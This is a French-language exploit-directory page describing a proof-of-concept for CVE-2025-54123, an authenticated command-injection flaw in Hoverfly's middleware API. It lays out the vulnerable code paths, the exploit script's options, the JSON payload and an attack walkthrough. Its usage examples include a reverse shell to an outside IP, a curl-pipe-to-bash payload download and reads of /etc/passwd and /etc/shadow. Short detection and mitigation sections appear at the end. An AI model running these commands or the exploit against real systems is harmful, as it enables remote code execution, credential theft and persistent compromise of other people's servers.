Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-54123-Poc — CVE-2025-54123 Hoverfly - Injection de commande RCE via Middleware Authentifié | Kitploit
Outils/GitHubGitHub/kasem545/cve-2025-54123-poc
Analyse des VulnérabilitésExploitationExploitation d'Applications WebPost-ExploitationTests d'IntrusionCommandement et ContrôleRed TeamingDéveloppement de Charges Utiles
GitHubkasem545/cve-2025-54123-poc

CVE-2025-54123-Poc

CVE-2025-54123 Hoverfly - Injection de commande RCE via Middleware Authentifié

Voir le dépôt
72il y a 5 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-54123 Exploit

Hoverfly Injection de commande RCE dans le middleware authentifié | CVSS 9.8 CRITIQUE

Vulnérabilité

Hoverfly <= 1.11.3 est vulnérable à une injection de commande authentifiée via le point d’accès /api/v2/hoverfly/middleware. Les identifiants administrateur sont requis, mais une fois authentifié, la fonctionnalité de middleware accepte les valeurs binaires et de script fournies par l’utilisateur sans validation, permettant l’exécution de commandes arbitraires.

Chaîne de vulnérabilité

  1. Validation d’entrée insuffisante - middleware.go accepte des chemins binaires arbitraires
  2. Exécution de commande non sécurisée - local_middleware.go transmet directement l’entrée utilisateur à exec.Command()
  3. Exécution immédiate - hoverfly_service.go exécute le middleware lors de la validation

Conditions requises

  • Identifiants administrateur Hoverfly valides (nom d’utilisateur/mot de passe)
  • Accès à l’API d’administration Hoverfly (port par défaut 8888)

Usage

root@kitploit:~
python3 exploit.py -t <TARGET_URL> -u <USERNAME> -p <PASSWORD> -c <COMMAND> [--shell SHELL]
  • -t, --target - Point d’accès API Hoverfly (obligatoire)
  • -u, --username - Nom d’utilisateur administrateur (obligatoire)
  • -p, --password - Mot de passe administrateur (obligatoire)
  • -c, --command - Commande à exécuter (obligatoire)
  • --shell - Shell binaire à utiliser (par défaut : /bin/bash)

Exemples

root@kitploit:~
# Basic command execution
python3 exploit.py -t http://localhost:8888 -u admin -p password -c whoami

# Read sensitive files
python3 exploit.py -t http://10.10.11.100:8888 -u admin -p pass123 -c "cat /etc/passwd"

# Reverse shell
python3 exploit.py -t http://target:8888 -u user -p secret -c "bash -i >& /dev/tcp/10.10.14.5/4444 0>&1"

# Multi-command execution
python3 exploit.py -t http://192.168.1.50:8888 -u admin -p admin -c "id; uname -a; pwd"

# Use different shell
python3 exploit.py -t http://victim:8888 -u root -p toor -c "cat /etc/shadow" --shell /bin/sh

# Download and execute payload
python3 exploit.py -t http://target:8888 -u admin -p pass -c "curl http://10.10.14.5/shell.sh | bash"

Déroulement de l’attaque

  1. L’attaquant s’authentifie avec des identifiants administrateur valides (authentification de base)
  2. Envoie une requête PUT à /api/v2/hoverfly/middleware avec une charge utile malveillante
  3. Hoverfly écrit le script dans un fichier temporaire /tmp/hoverfly_<random>
  4. Lors de la validation, exécute : <shell> /tmp/hoverfly_<random>
  5. La sortie de la commande est renvoyée dans la section STDOUT de la réponse d’erreur
  6. L’exploit extrait et affiche la sortie

Structure de la charge utile

root@kitploit:~
{
    "binary": "/bin/bash",
    "script": "whoami"
}

Les en-têtes HTTP incluent :

root@kitploit:~
Authorization: Basic YWRtaW46cGFzc3dvcmQ=
Content-Type: application/json

Impact

  • Exécution complète de code à distance avec les privilèges du processus Hoverfly
  • Vol d’identifiants - vol de clés API, jetons, secrets
  • Pivotement de réseau interne - compromission des systèmes adjacents
  • Exfiltration de données - accès aux données de simulation, configurations
  • Persistance - installation de portes dérobées, maintien de l’accès
  • Interruption de service - modification/suppression des configurations du middleware

Emplacements de code vulnérable

  • core/middleware/middleware.go:94-96 - Aucune validation d’entrée sur le paramètre binaire
  • core/middleware/local_middleware.go:14-19 - Utilisation non sécurisée de exec.Command()
  • core/hoverfly_service.go:173 - Exécution immédiate lors de la validation

Versions affectées

  • Hoverfly <= 1.11.3
  • Toutes les installations avec l’API d’administration accessible et l’authentification activée

Détection

Recherchez :

  • Requêtes PUT vers /api/v2/hoverfly/middleware
  • Réponses d’erreur contenant "STDOUT:" avec la sortie de commande
  • Fichiers temporaires dans /tmp/hoverfly/
  • Exécutions inhabituelles de processus à partir du service hoverfly

Atténuation

  • Mettre à jour vers la version corrigée (si disponible)
  • Restreindre l’accès à l’API d’administration aux adresses IP de confiance uniquement
  • Utiliser des identifiants d’authentification forts
  • Surveiller l’accès au point d’accès /api/v2/hoverfly/middleware
  • Implémenter la validation d’entrée sur les paramètres binaires/scripts

Références

  • CVE-2025-54123
  • CWE-78 (Injection de commande système)
  • CWE-20 (Validation d’entrée incorrecte)
  • GHSA-r4h8-hfp2-ggmf
  • https://github.com/SpectoLabs/hoverfly/security/advisories/GHSA-r4h8-hfp2-ggmf
  • https://nvd.nist.gov/vuln/detail/CVE-2025-54123

Crédits

Découverte originale : @Kr1shna4garwal

Télécharger l’outil